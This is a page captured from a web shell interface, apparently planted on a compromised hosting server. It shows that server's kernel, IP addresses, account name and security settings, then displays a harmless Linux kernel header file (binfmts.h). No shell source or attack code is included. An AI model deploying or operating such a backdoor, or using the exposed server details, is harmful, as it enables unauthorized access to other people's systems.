SHELL BYPASS 403 |
Modern UI. Responsive. Powerful.

Faizzz-Chin Shell

: /usr/include/linux/ [ drwxr-xr-x ]
Uname\Kernel: Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
Server: LiteSpeed
PHP Version: 8.3.30 [ PHP INFO ]
Operating System: Linux
Server Ip: 104.21.32.157
Your Ip: 216.73.217.61
Date Time: 2026-05-09 21:07:21
User: repauqkb (12019) | Group: repauqkb (11967)
Safe Mode: OFF
Disable Function: NONE

name : binfmts.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
#ifndef _LINUX_BINFMTS_H
#define _LINUX_BINFMTS_H

#include <linux/capability.h>

struct pt_regs;

/*
 * These are the maximum length and maximum number of strings passed to the
 * execve() system call.  MAX_ARG_STRLEN is essentially random but serves to
 * prevent the kernel from being unduly impacted by misaddressed pointers.
 * MAX_ARG_STRINGS is chosen to fit in a signed 32-bit integer.
 */
#define MAX_ARG_STRLEN (PAGE_SIZE * 32)
#define MAX_ARG_STRINGS 0x7FFFFFFF

/* sizeof(linux_binprm->buf) */
#define BINPRM_BUF_SIZE 256

#endif /* _LINUX_BINFMTS_H */
© 2026 Faizzz-Chin